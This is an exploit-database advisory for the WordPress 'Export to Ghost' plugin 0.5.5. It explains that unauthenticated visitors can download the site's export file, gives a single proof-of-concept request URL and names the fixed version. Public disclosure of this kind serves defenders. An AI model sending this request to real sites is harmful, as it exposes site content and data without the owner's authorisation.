WordPress Plugin Ghost 0.5.5 - Unrestricted Export Download

Author: Josh Brody
type: webapps
platform: php
port: 80.0
date_added: 2016-05-02 
date_updated: 2016-05-02 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comghost.0.5.5.zip

# Exploit Title: WordPress Export to Ghost Unrestricted Export Download
# Date: 28-04-2016
# Software Link: https://wordpress.org/plugins/ghost
# Exploit Author: Josh Brody
# Contact: http://twitter.com/joshmn
# Website: http://josh.mn/
# Category: webapps

1. Description

Any visitor can download the Ghost Export file because of a failure to check if an admin user is properly authenticated. Assume all versions < 0.5.6 are vulnerable.

2. Proof of Concept

http://example.com/wp-admin/tools.php?ghostexport=true&submit=Download+Ghost+file

File will be downloaded.

3. Solution:

Update to version 0.5.6

https://downloads.wordpress.org/plugin/ghost.0.5.6.zip